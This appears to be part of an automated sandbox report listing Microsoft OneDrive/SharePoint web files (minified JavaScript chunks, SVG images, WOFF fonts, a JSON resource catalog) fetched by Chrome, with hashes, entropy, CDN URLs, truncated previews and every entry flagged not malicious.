                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[267],{5935:function(e,t,n){n.d(t,{a:function(){return a}});var a=new(n("odsp.util_460").hK)("metadataSearchDataSource")}.,2175:function(e,t,n){n.r(t),n.d(t,{ENGAGEMENT_ROOT:function(){return i.a},EngagementBuilder:function(){return i.b},EngagementHelper:function(){return s},EngagementPart:function(){return i.d},EngagementPartType:function(){return i.c},clickEngagementPart:function(){return l.a},dropEngagementPart:function(){return l.b},getMostSpecificMatchingContext:function(){return u},keyPressEngagementPart:function(){return l.c},mergeEngagementData:function(){return c}});var a=n("tslib_102"),i=n(663),r=n(35),o=n(86),s=function(e){function t(t,n){void 0===t&&(t={}),void 0===n&&(n={});var a=e.call(this,t,n)||this,i=n.handlers,o=void 0===i?[]:i,s=n.logData,c=void 0===s?function(e){return r.a.logData(e)}:s;return a._handlers=o,a._logData=c,a}return(0,a.XJ)(t,e),t.prototype.logData=function(e){if(void 0===e&&(e
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (6539)
                                                  Category:dropped
                                                  Size (bytes):20767
                                                  Entropy (8bit):5.414908315060435
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DC40449594F81A170D208B499E37ABEC
                                                  SHA1:9C3FB5F13A030C1627F39CE4B5AC1DF759F9CF6D
                                                  SHA-256:6ED3D2DE50A3D705F6E20BA45FBF40FE8A984975F384CCAE1C713225FD9F0CE9
                                                  SHA-512:3C83D6E05ABCA505E5252F8FF600780735B82EB0841790EB97FD588E72CB1313326E185D80A17304C9B609C15332954783DD2F54EAC53D7B6BBB8938948FFFE8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[162],{5907:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return r}});var a=n(65);function i(e){return e===a.a.mySiteDocumentLibrary}function r(e){return!!e&&parseInt(e,10)>0}}.,3408:function(e,t,n){n.d(t,{a:function(){return p}});var a=n("tslib_102"),i=n("odsp.util_460"),r=n(1302),o=n(17),s=n(791),c=n(1500),d=n(1499),l=n(60),u=n(1524),f=i.HW.isActivated("c6d1b5d4-7ee0-4569-bba3-66800296443b"),p=new i.hK({name:"getItemKeyFromViewParams",factory:{dependencies:{appPageContext:o.a},create:function(e){var t=e.appPageContext;function n(e){var n,i=e.viewParams,o=e.isNavigation,d=f?t.listUrl:i[s.e];if(i[c.a]&&!i[s.e]){var u=i,p=c.a,m=(u[p],(0,a.l7)(u,["symbol"==typeof p?p:p+""]));d=(i=(0,a.W_)((0,a.W_)({},m),((n={})[s.e]=i[c.a],n)))[c.a]}var _=new l.b({context:t}),h=_.getUrlParts({path:i[s.b],listUrl:d});return(0,r.a)({viewParams:i,appPageContext:t,itemUrlParts:h,itemUrlHelper:_,isOnePage:!1,isNavigation
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):23303
                                                  Entropy (8bit):4.4279133667163215
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9C34CE39920CF75726CFED143D8E696B
                                                  SHA1:099B407B55A8F6BFC11E38F7D5A2F4DA1413D130
                                                  SHA-256:C610B70742B166344A21EB968DC620BE9AE6C76F3D09AB97F1678090E6DDDFA2
                                                  SHA-512:697BEC5D4FD0A75D631607985265A7BDA83BE1E4EBC14391749956E36C9703105C666921F2038CE4469585DD68D8538F21969BB43C0F28F626A4957ABF288789
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_recent_v2.svg
                                                  Preview:<svg id="GRAPHICS" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="208" height="208" viewBox="0 0 208 208"><defs><radialGradient id="radial-gradient" cx="2387.943" cy="120.54" fx="2396.1328462731167" r="8.378" gradientTransform="matrix(1, 0.02, -0.02, 1, -2238.303, -48.357)" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#e1dfdd"/><stop offset="0.335" stop-color="#e1dfdd"/><stop offset="0.61" stop-color="#c6c4c2"/><stop offset="1" stop-color="#e1dfdd"/></radialGradient><radialGradient id="radial-gradient-3" cx="779.506" cy="84.099" r="28.576" gradientTransform="matrix(0.995, -0.104, 0.105, 1.003, -717.608, 143.499)" gradientUnits="userSpaceOnUse"><stop offset="0.338" stop-color="#797673"/><stop offset="0.513" stop-color="#979592"/><stop offset="0.701" stop-color="#b1afac"/><stop offset="0.869" stop-color="#c1bebc"/><stop offset="1" stop-color="#c6c4c2"/></radialGradient></defs><path d="M92.2,174.117c-47.886,39.353-121.684.072-75.328-71.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (7235)
                                                  Category:dropped
                                                  Size (bytes):7334
                                                  Entropy (8bit):5.138765267335293
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AAF550F83548A472677CA0D8AF09EB40
                                                  SHA1:2FF0061EFBA8143D235565B37B07B85D457ED839
                                                  SHA-256:0B100BD5D5D6E6BB7F833AA6382A5C9809829805825FDAC7F0C8AE66F83E3276
                                                  SHA-512:0B7ED87E5700345A1FA5C6ACF8F51F9F1ABDF291C3E2BA8DEE540F226A68B73251087321B12787764E31296C1EF88133F4672083ED18A39E677105534B479AAF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:/*! For license information please see tslib-b1569464.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["tslib"],{tslib_102:function(e,t,n){n.d(t,{W_:function(){return r},nT:function(){return S},Hq:function(){return y},qA:function(){return D},jr:function(){return v},Zd:function(){return l},nu:function(){return w},Cn:function(){return E},bg:function(){return f},uh:function(){return s},m_:function(){return p},XJ:function(){return i},qr:function(){return u},D:function(){return O},JV:function(){return C},hY:function(){return I},ZX:function(){return d},$T:function(){return c},MS:function(){return _},l7:function(){return o},AE:function(){return g},CO:function(){return b},Te:function(){return h},OY:function(){return m}});var a=function(e,t){return a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},a(e,t)};function i(e,t){if("fun
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (57567)
                                                  Category:downloaded
                                                  Size (bytes):528276
                                                  Entropy (8bit):5.519095247403534
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FF3FD73B0B473E689F40E8CB8560F531
                                                  SHA1:D96B391D89D170D5F683869BB4CE31C750395A4A
                                                  SHA-256:E2F0BBCCE35094C55312CA78ADA70AE6359449B9C0F0B03CAC1C2700353700BC
                                                  SHA-512:F5C61685B12718573E99BF16B0E7BEF69E837042BBCB45DF92FF697D0F5744F4E456EB0DC622BE6A451203E2E72F54CB2C9D5608048F346835A89A7A30DB8D12
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.components/fui.co-54c36af8.js
                                                  Preview:/*! For license information please see fui.co-54c36af8.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.co"],{"fui.co_13":e=>{var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,a=Object.prototype.propertyIsEnumerable;function i(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map(function(e){return t[e]}).join(""))return!1;var a={};return"abcdefghijklmnopqrst".split("").forEach(function(e){a[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},a)).join("")}catch(e){return!1}}()?Object.assign:function(e,r){for(var o,s,c=i(e),d=1;d<arguments.length;d++){for(var l in o=Object(arguments[d]))n.call(o,l)&&(c[l]=o[l]);i
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 13164, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):13164
                                                  Entropy (8bit):7.966401667846051
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:882E5D4CC9F7106331B0DC45753D36C1
                                                  SHA1:0605E0D0CECA0F29A2D032185F74BF07E5C55252
                                                  SHA-256:0611DC6778BFBD8D581CF1031D2888D822AB0F513C91EEBEC0801072D311A97B
                                                  SHA-512:9D2F247A8A6B0D1F6A68EF9C49C894F19A07A1D59638B40F84A3C0FD95A6A518572A36F5996F795AF4C03919EADF4832A8CBB804F5060E4EBD623F9FD194F449
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-10-71daa628.woff
                                                  Preview:wOFF......3l......f.........................OS/2.......G...`0.m{cmap...P...R...2...5gasp................glyf......+s..V ...jhead...$...6...6#.hhea...\.......$....hmtx...x...X.....,..loca...............maxp../........ .q..name../........O..R.post..3X....... ....x.c`a..8...........L..t.!.I.(......@9......VP`px..^.....`u,......4..$.x...K(.Q...o.S...A(..@......R....x......f...R.o)ym..4.Y..?R.(n...9.s.9u....a...J1,.5..f1wk.C.~.6.O}H|r..u....*..R..N....F1.v....L.2..,d.KX.JV...t....a...p...$..%.s.k..&...=...S>...@...`_..L.O]....i......`...q...h...`...j...$^'<..^..Nr.V.J..).X.K...$...$...;n$J"q.w...K....:.0.^.........681.Fx..4a...@9\...U...Nh.b.. .....................x..|y|S..9w...e.,[.eK.$.6.e......`...6.H.... @.r..B.$.)IC..6!]2m.YKI'.L......4...I3M;._..5......W...o:...Y.:.{.o..s..G.&D.[...D".Z...mq.w.=.Be!..x....-..x.@...I.d.#5..k....i.......w..tqvK..).D[.....l.|..%9.....o^.jY.7..y.K9R...e....>.......vaN`9.5......{n^1...F...i*.$PJ.'..3.)..0]"....A...>_\..<p
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (32700)
                                                  Category:dropped
                                                  Size (bytes):34880
                                                  Entropy (8bit):5.377706580353428
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:39E764697808653DF46F51D1393C2DDD
                                                  SHA1:3C681764D21A252F9429D4EDDA7A66EA3ABA8A98
                                                  SHA-256:267C51453EF766CD2331F2E16D5504B8CE714BE81E683EE88D0ECF148CFDBD06
                                                  SHA-512:C3905F48548B9CB4B035A350473185CBA828D9D858184E6FC798D50610E84DAD5F73C4DC2F5D8DAC9A515472594C7D158D41DA414AB6CDC4C513C7A6018FCE14
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[62],{5933:function(e,t){var n=function(){function e(){this.R=0,this.G=0,this.B=0,this.A=e.maxComponent}return e.clone=function(t){return e.fromRgba(t.R,t.G,t.B,t.A)},e.equals=function(e,t){var n=!e,a=!t;return n||a?n&&a:e.R===t.R&&e.G===t.G&&e.B===t.B&&e.A===t.A},e.fromRgba=function(t,n,a,i){var r=new e;return r.R=Math.round(t),r.G=Math.round(n),r.B=Math.round(a),r.A=null!=i?Math.round(i):e.maxComponent,r},e.fromRgbaString=function(t){var n=new e;if(/^rgb.+/.test(t)){var a=t.match(/[\d.]+/g);n=e.fromRgba(Number(a[0]),Number(a[1]),Number(a[2]),4===a.length?Number(a[3])*e.maxComponent:null)}return n},e.fromHtmlColor=function(t){function n(e,t,n){return parseInt(e.charAt(t)+e.charAt(n),16)}var a=new e;if("string"==typeof t&&"#"===t.charAt(0))switch(t.length){case 9:a.A=n(t,1,2),a.R=n(t,3,4),a.G=n(t,5,6),a.B=n(t,7,8);break;case 7:a.R=n(t,1,2),a.G=n(t,3,4),a.B=n(t,5,6);break;case 4:a.R=n(t,1,1),a.G=n(t,2,2),a.B=n(
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4979)
                                                  Category:downloaded
                                                  Size (bytes):14889
                                                  Entropy (8bit):5.5147626326674875
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3300A5F7D66D7E5CF85BC58874E74E4F
                                                  SHA1:34D43D1B31681A0B01DA07AB1B9D21AD2C6E2C67
                                                  SHA-256:99654F778AC365369C50C5E17C95E88BAE946F2883AADF8A458EE5F2279C6AD6
                                                  SHA-512:4995F4F166813A22467B63E0A5C0C71EF2D4D8EC866E26527E22F388DFD7039EC393D4C7BC2981A473589C807F06B08AC8D5AC069770FB7070670A6E0D8DCE5B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/33693.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[33693],{130881:(e,t,n)=>{n.d(t,{NSV:()=>a});const a=(0,n(875427).k)("CutRegular","1em",["M5.92 2.23a.5.5 0 0 0-.84.54L9.4 9.43l-1.92 2.96a3 3 0 1 0 .78.64L10 10.35l1.74 2.68a3 3 0 1 0 .78-.64L5.92 2.23ZM14 17a2 2 0 1 1 0-4 2 2 0 0 1 0 4ZM4 15a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm7.2-6.49-.6-.92 3.48-5.36a.5.5 0 0 1 .84.54l-3.73 5.74Z"])}.,136621:(e,t,n)=>{n.d(t,{DNO:()=>s,_6e:()=>o,mke:()=>i,s5V:()=>r});var a=n(875427);const i=(0,a.k)("PersonVoice20Regular","20",["M15.85 1.15a.5.5 0 0 0-.7.7 6.6 6.6 0 0 1 1.72 4.65 6.6 6.6 0 0 1-1.72 4.65.5.5 0 0 0 .7.7 7.6 7.6 0 0 0 2.03-5.35 7.6 7.6 0 0 0-2.03-5.35Zm-2 2a.5.5 0 0 0-.7.7c.63.64.97 1.62.97 2.65 0 1.03-.34 2.01-.97 2.65a.5.5 0 0 0 .7.7 4.76 4.76 0 0 0 1.28-3.35c0-1.22-.41-2.49-1.28-3.35ZM4 7a4 4 0 1 1 8 0 4 4 0 0 1-8 0Zm4-3a3 3 0 1 0 0 6 3 3 0 0 0 0-6ZM1 14a2 2 0 0 1 2-2h10a2 2 0 0 1 2 2c0 1.7-.83 2.97-2.13 3.8A9.14 9.14 0 0 1 8 19a9.14 9.14 0 0 1-4.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (5159)
                                                  Category:downloaded
                                                  Size (bytes):11651
                                                  Entropy (8bit):5.337369885391587
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D34995B7F8EADB5435D8091DAC4C1CA5
                                                  SHA1:43AE7FBE88EA6DC8249BFD7FCB6F90165638D2D7
                                                  SHA-256:43892D057F9BE419A84EABE0974B6D9DFA6C27F0C9F04EA4F35CEFF3F51DF0CB
                                                  SHA-512:E35BFB39507356E7336A962B557CD99273C979347854F985BB6F819E3556C6E839212891F6EEA4590BC928B769E1C7E2405AD5D80B41D03C5793329047E60FE2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/29386.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[29386],{707043:(e,t,n)=>{function a(e){r!==e&&(r=e)}function i(){return void 0===r&&(r="undefined"!=typeof document&&!!document.documentElement&&"rtl"===document.documentElement.getAttribute("dir")),r}var r;function o(){return{rtl:i()}}n.d(t,{Lo:()=>o,mk:()=>a}),r=i()}.,614231:(e,t,n)=>{n.d(t,{Y:()=>s});var a,i=n(295610),r="undefined"!=typeof navigator&&/rv:11.0/.test(navigator.userAgent),o={};try{o=window||{}}catch(e){}var s=function(){function e(e,t){var n,a,r,o,s,c;this._rules=[],this._preservedRules=[],this._counter=0,this._keyToClassName={},this._onInsertRuleCallbacks=[],this._onResetCallbacks=[],this._classNameToArgs={},this._config=(0,i.__assign)({injectionMode:"undefined"==typeof document?0:1,defaultPrefix:"css",namespace:void 0,cspSettings:void 0},e),this._classNameToArgs=null!==(n=null==t?void 0:t.classNameToArgs)&&void 0!==n?n:this._classNameToArgs,this._counter=null!==(a=null==t?
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (44683)
                                                  Category:downloaded
                                                  Size (bytes):221181
                                                  Entropy (8bit):5.430081434885842
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0A1954BA20D86AD3965EDC5BCB39B261
                                                  SHA1:33E7AF857B37BF454DADADF44AE38438C48219EF
                                                  SHA-256:A1788B024F1614DBD9B074D2C882BF6D1CF12BD3E2093E5F7D222D1E8EB39FE0
                                                  SHA-512:B6155DADD2B445CED0744BE6FB1967AAFD7B621C05A7F8FA093EB67C485FA46E49AE3594B308613511350A0EC19CF80402853BD4936BA8DE6CAFEF6DE25F0BA7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/fluentMtc.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[95954],{38500:(e,t,n)=>{n.d(t,{f:()=>s});var a=n(950958),i=n(408156),r=n.n(i),o=n(285618),s=r().memo(function(e){var t=(0,o.HF)().fluentMtcProviderId;return r().createElement(a.Ib,{value:t},e.children)})}.,285618:(e,t,n)=>{n.d(t,{$$:()=>D,HF:()=>g,Km:()=>h,Sp:()=>p,nl:()=>m,op:()=>y,rO:()=>b,uQ:()=>_,w5:()=>v,zL:()=>S});var a=n(295610),i=n(408156),r=n.n(i),o=n(836682),s=n(639849),c=n(327482),d=n(567022),l=n(188830),u=n(241171),f=r().createContext({}),p=["ArrowDown","ArrowLeft","ArrowRight","ArrowUp","Digit0","Digit1","Digit2","Digit3","Digit4","Digit5","Digit6","Digit7","Digit8","Digit9","Enter","KeyC","KeyG","KeyJ","KeyK","KeyL","KeyM","KeyO","KeyP","KeyR","KeyS","KeyX","KeyZ","Slash","Space"],m=function(e){var t=e.children,n=e.uiConfiguration,i=e.player,p=e.context,m=e.playerContainer,_=e.themeData,h=e.getHostTheme,b=e.overflowButtons,g=e.reportUserActivity,v=e.pluginsKeyboardShortcuts,y=e
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3596)
                                                  Category:downloaded
                                                  Size (bytes):9549
                                                  Entropy (8bit):5.167057839759214
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:171AB5EDEC1903A94A8FA9EAD66BCF8F
                                                  SHA1:6567630E72EB4FC6C017B058EB316930D18DAE2B
                                                  SHA-256:984831D6CDE09406B45B9A1E09D6AAF00115A487C266C5586EE194D84FC82E8F
                                                  SHA-512:46CC79706E99E933FAA65A7BF53B9FA5DDAE4C929794EB196276BC23F5E786CB89A96256FB000BB6DDDCB80921EC79DF65A87575F89C7D69CEFEB5A486401575
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/1.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1],{2457:function(e,t,n){n.d(t,{a:function(){return m},b:function(){return l},d:function(){return f},e:function(){return u}});var a=n("tslib_102"),i=n("odsp.util_460"),r=n(107),o=n(118),s=n(1133),c=n(182),d="@ms/odsp-shared/lib/base/BaseModel",l=new i.hK({name:"".concat(d,".asyncType"),factory:new i.t_(o.a)}),u=new i.hK({name:"".concat(d,".observablesFactoryType"),factory:new i.k(s.a,{asyncType:l.optional})}),f=new i.hK({name:"".concat(d,".eventGroupType"),factory:new i.t_(r.a)}),p=new i.hK({name:"".concat(d,".errorHandler")}),m=function(e){function t(t,n){void 0===t&&(t={}),void 0===n&&(n={});var a=e.call(this,t,n)||this,i=t.id,r=void 0===i?"":i;return a.id=r,a._BaseModel_dependencies=n,a}return(0,a.XJ)(t,e),Object.defineProperty(t.prototype,"async",{get:function(){return this._BaseModel_getAsync()},enumerable:!1,configurable:!0}),Object.defineProperty(t.prototype,"events",{get:function(){return this._BaseMo
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 15908, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):15908
                                                  Entropy (8bit):7.980063194151935
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2838E6EAA5CC9BC94D3327E2720D2496
                                                  SHA1:734C1F1975B0CCB39F477C2632697BC705626664
                                                  SHA-256:AB1D3AA0425DAAC126739A9566B0435EF577F88F777315EB1E9CEE14FE7DB810
                                                  SHA-512:230945D032756D1DAFBE567D49E9B93C265A2935FFCCC92A914A64ED4D96244A7547B04C3D890AA0BAC67295A0A4112EBC93F277C406B37F74B53EF8460599A0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-5-3d537ea4.woff
                                                  Preview:wOFF......>$......}<........................OS/2.......G...`,.s.cmap...P........@3(.gasp................glyf......5...l..t..head..8....4...6#...hhea..9........$....hmtx..9,...[.... ...loca..9.........G.d6maxp..:T....... .z.~name..:l.......O..R.post..>........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px2..b.0.B2..@x....R..%.x...](.a.......B'..{.....\(u"2s.DM.....\X.In. .).k+s!.jnh.ZyimKD....1......v....<.......QJ....V.^.i_O.o.4}.....*u...t...Nf1..v....c?.9.a.r....4g9...".....r....W~.w..6w..=.....zx.c..o....CL.HB.".b.H.DI......8..DI.4qJ.d.Sy&.......%.L..x.J.......;...\._.n......ny.}......}^.....s.....j...|..>a.-hF.f.iL.......P.w(@......"t......Z..<...[. ...B=J.}.....HF...@.~.%.6..$D.9.:..0Xt...o.`@.....]KYP..?...0?..../4.#...............x..}.x...9S.h...4[.uV.Z..{eI.m..r.;6....6.&...ll.`...:!...%.$...H.{.{..G.K./@..<.xp..;~........}..fv.9....?..x.......@.....|....e#.....~..Q~..S......^2...i...gk/......+..$.xk..Z.s...r.....4{..0..tQ0p.co|t..Go<v.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (2203)
                                                  Category:downloaded
                                                  Size (bytes):2232
                                                  Entropy (8bit):5.181881048817154
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9A18E2732903418FB19F7B1FCE90340B
                                                  SHA1:30668178DE59055A8175F70AAF867063EE7F4A60
                                                  SHA-256:A4981936301595558B7684E9035B4C3C9F8AF3951C3BE864BB114B32B3A52F66
                                                  SHA-512:66841C20E86755FD382846FC0E9B7832FB3EB6E95A8C8FF9B63F3DF4871529293E0D8A91FC5C4C52D0996D3C50AF4242ADEE48821037A01C035AE3EBCD74E9D9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.legacy.customizable/fui.lcu-f42c220a.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.lcu"],{"fui.lcu_514":(e,t,n)=>{n.d(t,{bs:()=>s,uS:()=>c,LK:()=>d,Yn:()=>o});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.util_369");function o(e,t){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n]);return t}var s=i.createContext({customizations:{inCustomizerContext:!1,settings:{},scopedSettings:{}}});function c(){for(var e=[],t=0;t<arguments.length;t++)e[t]=arguments[t];if(e&&1===e.length&&e[0]&&!e[0].subComponentStyles)return e[0];for(var n={},i={},r=0,o=e;r<o.length;r++){var s=o[r];if(s)for(var d in s)if(s.hasOwnProperty(d)){if("subComponentStyles"===d&&void 0!==s.subComponentStyles){var l=s.subComponentStyles;for(var u in l)l.hasOwnProperty(u)&&(i.hasOwnProperty(u)?i[u].push(l[u]):i[u]=[l[u]]);continue}var f=n[d],p=s[d];n[d]=void 0===f?p:(0,a.AE)((0,a.AE)([],Array.isArray(f)?f:[f],!0),Array.isArray(p)?p:[p],!0)}}if(Object.keys(i).length>0){n.subComponentStyles={};var m=n.subComponentStyles,_=function(
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):30974
                                                  Entropy (8bit):5.1786941309228585
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B78369D8142469372669E29A75A584F0
                                                  SHA1:9CE0205B10252FE77C5C7A4111CE28B796348E66
                                                  SHA-256:25B316B92C4E2FA855F65AD456D94B2E351E6DF512258D079AE45E6128D6A313
                                                  SHA-512:50C0F01FF7A5FF3B0D4754988900F7372D491331DCD5FEA11837C4FAA3FABEECF342712566A67031E072D0F168F232F1B19439AA5C667DB1E68F6A3AAB184CDE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"Architecture":1,"Audience":1,"Resources":{"Version":"1.20240906.4.0","CatalogXml":"<ResourceCatalog>\r\n <Resources>\r\n <Resource Key=\"_store_mecontrol-fluent-web_3_28_4-preview_4-6878c0a7c72dfd36d165_node_modules_mecontrol_flue-95d063\" Type=\"LTRRTLPath\">\r\n <RTLPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-6878c0a7c72dfd36d165_node_modules_mecontrol_flue-95d063.e6651788306428d03515.rtl.js</RTLPath>\r\n <LTRPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-6878c0a7c72dfd36d165_node_modules_mecontrol_flue-95d063.e6651788306428d03515.js</LTRPath>\r\n </Resource>\r\n <Resource Key=\"_store_mecontrol-fluent-web_3_28_4-preview_4-6878c0a7c72dfd36d165_node_modules_mecontrol_flue-9b5d4b\" Type=\"LTRRTLPath\">\r\n <RTLPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-6878c0a7c72dfd36d165_node_modules_mecontrol_flue-9b5d4b.8c9db2fc0be4aa733556.rtl.js</RTLPath>\r\n <LTRPath>suiteux.shell._store_mecontrol-fluent-we
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 13772, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):13772
                                                  Entropy (8bit):7.975105972015564
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5E7EB0632035D003E826BE068CA7E82E
                                                  SHA1:DF32D69FFD8A93423964939C44A3EE8D970E4A11
                                                  SHA-256:EE8AFE4B05DC9C705E66C2191DE4931E55622FD728A99BC9FEF6B00E5772D006
                                                  SHA-512:69B053970DA5F4CE5CF6D0F965C419C038CB053B5093E19F540CEA7007E14C3737FD6C5C095BCEEC9DBFABCAFBA03C500DE2A2EE8590A992F0170919CF817D4A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-13-ad4054dd.woff
                                                  Preview:wOFF......5.......kh........................OS/2.......G...`9.q.cmap...P...%.....hgasp...x............glyf..........[....head..0....2...6#.hhea..0........$....hmtx..0....W.....C..loca..10.........(.~maxp..1........ .q..name..2........O..R.post..5........ ....x.c`a..8...........L..t.!.I.(......@9......VP`p.x..j.0.B2..@x....\..u.x...K+.a....i\...v2R...cBv&Q...P6.6..Rdaa......`.X`.....$5...%...NY...:...1&`.Yc....f....>j:L...^.>.f.Ys........_..2....b..F....lb.[......>.s.C....8.INs...."W..$S..<c|...+.[.U....^....&8.[s\....y.%.i...%.!it..f7.KP..H@j..*....G.....B.i.#.cd..n.l..)$q.S...G8.....=..~[..e...g|.>1.................x..|.t...{U]].,..j...V..%KjI.j..V[...-...E...x7...1^...0.......|..@.$|.3dB ......$d...8.....}..7.......U.^.....UD ..b.O.AD".BMv.d7...E....K..#.....B.QI#.J.H..E...#.M.A.g....S^..p{.X.....l.+.|.r.........4.Jx.s.B.o.N.^..}.....;..%..r.(;..e..K..c[..`.).t..$.e..6.u......+..RH....H...8..L09;L...8a8P..)v.d.>..gr.D..7....J..^.c.Y.W].%..W.g....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3242)
                                                  Category:downloaded
                                                  Size (bytes):7695
                                                  Entropy (8bit):5.253352004225824
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B32B2DC5BF091BCF7807BC16BADB3956
                                                  SHA1:CA5ED6E08DD815F75ADCD922E3AB76EFFE837B92
                                                  SHA-256:B6A29C6C24D50D1335C4DE2B7814A0C215D7CB07EC80C7AD5B5C1073C0654BE3
                                                  SHA-512:82217445232FB40249A57B942BDFCF397857416D38BF182F2CB5940ACD0942ABD90028AD3E98394102C05E4D94CEEC2B9968B07CC466A132A9013EFBEC94D707
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/1664.js
